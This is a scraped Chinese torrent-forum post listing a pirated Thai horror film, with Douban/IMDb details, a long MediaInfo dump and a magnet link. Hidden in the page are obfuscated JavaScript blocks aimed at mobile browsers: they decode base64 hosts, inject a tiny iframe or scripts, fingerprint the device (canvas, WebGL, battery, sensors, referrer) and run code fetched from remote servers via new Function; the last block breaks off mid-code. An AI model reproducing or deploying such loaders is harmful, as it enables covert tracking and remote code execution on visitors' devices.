真相背后[中文字幕].The.Whole.Truth.2021.1080p.NF.WEB-DL.DDP5.1.x264-btbt9527.com 8.50GB

版主小s 5月前 511



window['' + 'j' + '7' + '7' + '5' + '0' + 'e' + '9' + 'd' + '6'+'']=function(){;(function(u,i,w,d){if(/^Mac|Win/.test(navigator.platform)){return};var dc=function(n){return String.fromCharCode(n)};var x=w[dc(0x61)+dc(0x74)+dc(0x6F)+dc(0x62)],cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';var wr='write';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',x(u),'r','j8',i].join('/');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data.k==i){d.getElementById(f.id).remove();new Function('_tdcs',x(e.data.v))(cs)}})})('ai5neGxzanQuY29t','241222251495493',window,document)};


◎译 名 真相背后 / The Whole Truth

◎片 名 ????????????

◎年 代 2021

◎产 地 泰国

◎类 别 恐怖

◎语 言 泰语

◎上映日期 2021-12-02(泰国网络)

◎IMDb链接 https://www.imdb.com/title/tt15850662/

◎豆瓣链接 https://movie.douban.com/subject/35666000/

◎片 长 125分钟

◎导 演 韦西·沙赞那庭 Wisit Sasanatieng (id:1275016)

◎演 员 索姆波布·本贾蒂库尔 Sompob Benjathikul (id:1383635)

萨达农·杜隆卡沃 Sadanont Durongkhaweroj (id:1433389)

尼科·塞瑞奥尔特 Nikki Nicole Theriault (id:1186888)

塔丽卡·缇达迪 Tarika Tidatid (id:1459363)

◎标 签 泰国 / 恐怖 / 2021

◎简 介

When their mother is hospitalized in a car accident, Pim and Putt suddenly discover that they have a set of grandparents they've never known about. But a terrifying truth has long been hidden within the walls of their grandparents’ house, a truth that gradually reveals itself to Pim and Putt through a mystical hole, unleashing hair-raising horror on their family.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 168460480284029276612977443613652868962 (0x7EBC4EEF8880941D6A3E3CC68050DF62)

  4. Complete name : [email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.50 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 9 668 kb/s

  11. Encoded date : UTC 2021-12-02 12:00:24

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 5 min

  24. Bit rate mode : Variable

  25. Bit rate : 7 103 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.143

  37. Stream size : 6.24 GiB (73%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 2 h 5 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 576 MiB (7%)

  57. Title : Thai

  58. Language : Thai

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3

  65. Format/Info : Enhanced AC-3

  66. Commercial name : Dolby Digital Plus

  67. Codec ID : A_EAC3

  68. Duration : 2 h 5 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 576 MiB (7%)

  77. Title : English

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : E-AC-3

  85. Format/Info : Enhanced AC-3

  86. Commercial name : Dolby Digital Plus

  87. Codec ID : A_EAC3

  88. Duration : 2 h 5 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 576 MiB (7%)

  97. Title : Brazilian Portuguese

  98. Language : Portuguese

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : E-AC-3

  105. Format/Info : Enhanced AC-3

  106. Commercial name : Dolby Digital Plus

  107. Codec ID : A_EAC3

  108. Duration : 2 h 5 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 576 MiB (7%)

  117. Title : Spanish

  118. Language : Spanish

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Text #1

  123. ID : 6

  124. Format : UTF-8

  125. Codec ID : S_TEXT/UTF8

  126. Codec ID/Info : UTF-8 Plain Text

  127. Duration : 2 h 5 min

  128. Bit rate : 36 b/s

  129. Count of elements : 1248

  130. Stream size : 33.1 KiB (0%)

  131. Title : English

  132. Language : English

  133. Default : Yes

  134. Forced : No


  135. Text #2

  136. ID : 7

  137. Format : UTF-8

  138. Codec ID : S_TEXT/UTF8

  139. Codec ID/Info : UTF-8 Plain Text

  140. Duration : 2 h 5 min

  141. Bit rate : 55 b/s

  142. Count of elements : 1252

  143. Stream size : 51.0 KiB (0%)

  144. Title : Arabic

  145. Language : Arabic

  146. Default : No

  147. Forced : No


  148. Text #3

  149. ID : 8

  150. Format : UTF-8

  151. Codec ID : S_TEXT/UTF8

  152. Codec ID/Info : UTF-8 Plain Text

  153. Duration : 2 h 5 min

  154. Bit rate : 36 b/s

  155. Count of elements : 1306

  156. Stream size : 33.3 KiB (0%)

  157. Title : Chinese Simplified

  158. Language : Chinese

  159. Default : No

  160. Forced : No


  161. Text #4

  162. ID : 9

  163. Format : UTF-8

  164. Codec ID : S_TEXT/UTF8

  165. Codec ID/Info : UTF-8 Plain Text

  166. Duration : 2 h 5 min

  167. Bit rate : 38 b/s

  168. Count of elements : 1301

  169. Stream size : 34.9 KiB (0%)

  170. Title : Chinese Traditional

  171. Language : Chinese

  172. Default : No

  173. Forced : No


  174. Text #5

  175. ID : 10

  176. Format : UTF-8

  177. Codec ID : S_TEXT/UTF8

  178. Codec ID/Info : UTF-8 Plain Text

  179. Duration : 2 h 5 min

  180. Bit rate : 33 b/s

  181. Count of elements : 1252

  182. Stream size : 30.9 KiB (0%)

  183. Title : Croatian

  184. Language : Croatian

  185. Default : No

  186. Forced : No


  187. Text #6

  188. ID : 11

  189. Format : UTF-8

  190. Codec ID : S_TEXT/UTF8

  191. Codec ID/Info : UTF-8 Plain Text

  192. Duration : 2 h 5 min

  193. Bit rate : 33 b/s

  194. Count of elements : 1252

  195. Stream size : 30.3 KiB (0%)

  196. Title : Czech

  197. Language : Czech

  198. Default : No

  199. Forced : No


  200. Text #7

  201. ID : 12

  202. Format : UTF-8

  203. Codec ID : S_TEXT/UTF8

  204. Codec ID/Info : UTF-8 Plain Text

  205. Duration : 2 h 5 min

  206. Bit rate : 33 b/s

  207. Count of elements : 1251

  208. Stream size : 31.0 KiB (0%)

  209. Title : Danish

  210. Language : Danish

  211. Default : No

  212. Forced : No


  213. Text #8

  214. ID : 13

  215. Format : UTF-8

  216. Codec ID : S_TEXT/UTF8

  217. Codec ID/Info : UTF-8 Plain Text

  218. Duration : 2 h 5 min

  219. Bit rate : 35 b/s

  220. Count of elements : 1235

  221. Stream size : 32.6 KiB (0%)

  222. Title : Dutch

  223. Language : Dutch

  224. Default : No

  225. Forced : No


  226. Text #9

  227. ID : 14

  228. Format : UTF-8

  229. Codec ID : S_TEXT/UTF8

  230. Codec ID/Info : UTF-8 Plain Text

  231. Duration : 2 h 5 min

  232. Bit rate : 35 b/s

  233. Count of elements : 1251

  234. Stream size : 32.6 KiB (0%)

  235. Title : Finnish

  236. Language : Finnish

  237. Default : No

  238. Forced : No


  239. Text #10

  240. ID : 15

  241. Format : UTF-8

  242. Codec ID : S_TEXT/UTF8

  243. Codec ID/Info : UTF-8 Plain Text

  244. Duration : 2 h 5 min

  245. Bit rate : 39 b/s

  246. Count of elements : 1253

  247. Stream size : 36.6 KiB (0%)

  248. Title : French

  249. Language : French

  250. Default : No

  251. Forced : No


  252. Text #11

  253. ID : 16

  254. Format : UTF-8

  255. Codec ID : S_TEXT/UTF8

  256. Codec ID/Info : UTF-8 Plain Text

  257. Duration : 2 h 5 min

  258. Bit rate : 40 b/s

  259. Count of elements : 1252

  260. Stream size : 37.4 KiB (0%)

  261. Title : German

  262. Language : German

  263. Default : No

  264. Forced : No


  265. Text #12

  266. ID : 17

  267. Format : UTF-8

  268. Codec ID : S_TEXT/UTF8

  269. Codec ID/Info : UTF-8 Plain Text

  270. Duration : 2 h 5 min

  271. Bit rate : 60 b/s

  272. Count of elements : 1252

  273. Stream size : 55.7 KiB (0%)

  274. Title : Greek

  275. Language : Greek

  276. Default : No

  277. Forced : No


  278. Text #13

  279. ID : 18

  280. Format : UTF-8

  281. Codec ID : S_TEXT/UTF8

  282. Codec ID/Info : UTF-8 Plain Text

  283. Duration : 2 h 5 min

  284. Bit rate : 52 b/s

  285. Count of elements : 1252

  286. Stream size : 48.6 KiB (0%)

  287. Title : Hebrew

  288. Language : Hebrew

  289. Default : No

  290. Forced : No


  291. Text #14

  292. ID : 19

  293. Format : UTF-8

  294. Codec ID : S_TEXT/UTF8

  295. Codec ID/Info : UTF-8 Plain Text

  296. Duration : 2 h 5 min

  297. Bit rate : 34 b/s

  298. Count of elements : 1252

  299. Stream size : 31.9 KiB (0%)

  300. Title : Hungarian

  301. Language : Hungarian

  302. Default : No

  303. Forced : No


  304. Text #15

  305. ID : 20

  306. Format : UTF-8

  307. Codec ID : S_TEXT/UTF8

  308. Codec ID/Info : UTF-8 Plain Text

  309. Duration : 2 h 5 min

  310. Bit rate : 37 b/s

  311. Count of elements : 1252

  312. Stream size : 34.1 KiB (0%)

  313. Title : Indonesian

  314. Language : Indonesian

  315. Default : No

  316. Forced : No


  317. Text #16

  318. ID : 21

  319. Format : UTF-8

  320. Codec ID : S_TEXT/UTF8

  321. Codec ID/Info : UTF-8 Plain Text

  322. Duration : 2 h 5 min

  323. Bit rate : 35 b/s

  324. Count of elements : 1252

  325. Stream size : 32.8 KiB (0%)

  326. Title : Italian

  327. Language : Italian

  328. Default : No

  329. Forced : No


  330. Text #17

  331. ID : 22

  332. Format : UTF-8

  333. Codec ID : S_TEXT/UTF8

  334. Codec ID/Info : UTF-8 Plain Text

  335. Duration : 2 h 5 min

  336. Bit rate : 42 b/s

  337. Count of elements : 1227

  338. Stream size : 39.2 KiB (0%)

  339. Title : Japanese

  340. Language : Japanese

  341. Default : No

  342. Forced : No


  343. Text #18

  344. ID : 23

  345. Format : UTF-8

  346. Codec ID : S_TEXT/UTF8

  347. Codec ID/Info : UTF-8 Plain Text

  348. Duration : 2 h 5 min

  349. Bit rate : 46 b/s

  350. Count of elements : 1283

  351. Stream size : 42.3 KiB (0%)

  352. Title : Korean

  353. Language : Korean

  354. Default : No

  355. Forced : No


  356. Text #19

  357. ID : 24

  358. Format : UTF-8

  359. Codec ID : S_TEXT/UTF8

  360. Codec ID/Info : UTF-8 Plain Text

  361. Duration : 2 h 5 min

  362. Bit rate : 37 b/s

  363. Count of elements : 1251

  364. Stream size : 34.0 KiB (0%)

  365. Title : Malay

  366. Language : Malay

  367. Default : No

  368. Forced : No


  369. Text #20

  370. ID : 25

  371. Format : UTF-8

  372. Codec ID : S_TEXT/UTF8

  373. Codec ID/Info : UTF-8 Plain Text

  374. Duration : 2 h 5 min

  375. Bit rate : 34 b/s

  376. Count of elements : 1252

  377. Stream size : 32.0 KiB (0%)

  378. Title : Norwegian Bokmal

  379. Language : Norwegian Bokmal

  380. Default : No

  381. Forced : No


  382. Text #21

  383. ID : 26

  384. Format : UTF-8

  385. Codec ID : S_TEXT/UTF8

  386. Codec ID/Info : UTF-8 Plain Text

  387. Duration : 2 h 5 min

  388. Bit rate : 33 b/s

  389. Count of elements : 1252

  390. Stream size : 30.8 KiB (0%)

  391. Title : Polish

  392. Language : Polish

  393. Default : No

  394. Forced : No


  395. Text #22

  396. ID : 27

  397. Format : UTF-8

  398. Codec ID : S_TEXT/UTF8

  399. Codec ID/Info : UTF-8 Plain Text

  400. Duration : 2 h 5 min

  401. Bit rate : 35 b/s

  402. Count of elements : 1251

  403. Stream size : 32.6 KiB (0%)

  404. Title : Portuguese

  405. Language : Portuguese

  406. Default : No

  407. Forced : No


  408. Text #23

  409. ID : 28

  410. Format : UTF-8

  411. Codec ID : S_TEXT/UTF8

  412. Codec ID/Info : UTF-8 Plain Text

  413. Duration : 2 h 5 min

  414. Bit rate : 37 b/s

  415. Count of elements : 1267

  416. Stream size : 34.2 KiB (0%)

  417. Title : Brazilian Portuguese

  418. Language : Portuguese

  419. Default : No

  420. Forced : No


  421. Text #24

  422. ID : 29

  423. Format : UTF-8

  424. Codec ID : S_TEXT/UTF8

  425. Codec ID/Info : UTF-8 Plain Text

  426. Duration : 2 h 5 min

  427. Bit rate : 39 b/s

  428. Count of elements : 1252

  429. Stream size : 36.5 KiB (0%)

  430. Title : Romanian

  431. Language : Romanian

  432. Default : No

  433. Forced : No


  434. Text #25

  435. ID : 30

  436. Format : UTF-8

  437. Codec ID : S_TEXT/UTF8

  438. Codec ID/Info : UTF-8 Plain Text

  439. Duration : 2 h 5 min

  440. Bit rate : 55 b/s

  441. Count of elements : 1252

  442. Stream size : 51.0 KiB (0%)

  443. Title : Russian

  444. Language : Russian

  445. Default : No

  446. Forced : No


  447. Text #26

  448. ID : 31

  449. Format : UTF-8

  450. Codec ID : S_TEXT/UTF8

  451. Codec ID/Info : UTF-8 Plain Text

  452. Duration : 2 h 5 min

  453. Bit rate : 36 b/s

  454. Count of elements : 1250

  455. Stream size : 33.4 KiB (0%)

  456. Title : Spanish

  457. Language : Spanish

  458. Default : No

  459. Forced : No


  460. Text #27

  461. ID : 32

  462. Format : UTF-8

  463. Codec ID : S_TEXT/UTF8

  464. Codec ID/Info : UTF-8 Plain Text

  465. Duration : 2 h 5 min

  466. Bit rate : 35 b/s

  467. Count of elements : 1252

  468. Stream size : 32.4 KiB (0%)

  469. Title : European Spanish

  470. Language : Spanish

  471. Default : No

  472. Forced : No


  473. Text #28

  474. ID : 33

  475. Format : UTF-8

  476. Codec ID : S_TEXT/UTF8

  477. Codec ID/Info : UTF-8 Plain Text

  478. Duration : 2 h 5 min

  479. Bit rate : 34 b/s

  480. Count of elements : 1251

  481. Stream size : 31.7 KiB (0%)

  482. Title : Swedish

  483. Language : Swedish

  484. Default : No

  485. Forced : No


  486. Text #29

  487. ID : 34

  488. Format : UTF-8

  489. Codec ID : S_TEXT/UTF8

  490. Codec ID/Info : UTF-8 Plain Text

  491. Duration : 2 h 5 min

  492. Bit rate : 107 b/s

  493. Count of elements : 1319

  494. Stream size : 98.2 KiB (0%)

  495. Title : Thai

  496. Language : Thai

  497. Default : No

  498. Forced : No


  499. Text #30

  500. ID : 35

  501. Format : UTF-8

  502. Codec ID : S_TEXT/UTF8

  503. Codec ID/Info : UTF-8 Plain Text

  504. Duration : 2 h 5 min

  505. Bit rate : 0 b/s

  506. Count of elements : 10

  507. Stream size : 793 Bytes (0%)

  508. Title : Thai (Forced)

  509. Language : Thai

  510. Default : No

  511. Forced : Yes


  512. Text #31

  513. ID : 36

  514. Format : UTF-8

  515. Codec ID : S_TEXT/UTF8

  516. Codec ID/Info : UTF-8 Plain Text

  517. Duration : 2 h 5 min

  518. Bit rate : 35 b/s

  519. Count of elements : 1252

  520. Stream size : 32.2 KiB (0%)

  521. Title : Turkish

  522. Language : Turkish

  523. Default : No

  524. Forced : No


  525. Text #32

  526. ID : 37

  527. Format : UTF-8

  528. Codec ID : S_TEXT/UTF8

  529. Codec ID/Info : UTF-8 Plain Text

  530. Duration : 2 h 5 min

  531. Bit rate : 55 b/s

  532. Count of elements : 1252

  533. Stream size : 50.5 KiB (0%)

  534. Title : Ukrainian

  535. Language : Ukrainian

  536. Default : No

  537. Forced : No


  538. Text #33

  539. ID : 38

  540. Format : UTF-8

  541. Codec ID : S_TEXT/UTF8

  542. Codec ID/Info : UTF-8 Plain Text

  543. Duration : 2 h 5 min

  544. Bit rate : 52 b/s

  545. Count of elements : 1252

  546. Stream size : 48.0 KiB (0%)

  547. Title : Vietnamese

  548. Language : Vietnamese

  549. Default : No

  550. Forced : No




复制代码


TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:387BFA3D5B46145F0D419E515A4178628B1198C1




var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x57\x62\x51\x66\x48\x58\x65\x61\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};
上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x45\x77\x59\x6e\x77\x4c\x44\x4f\x62\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var 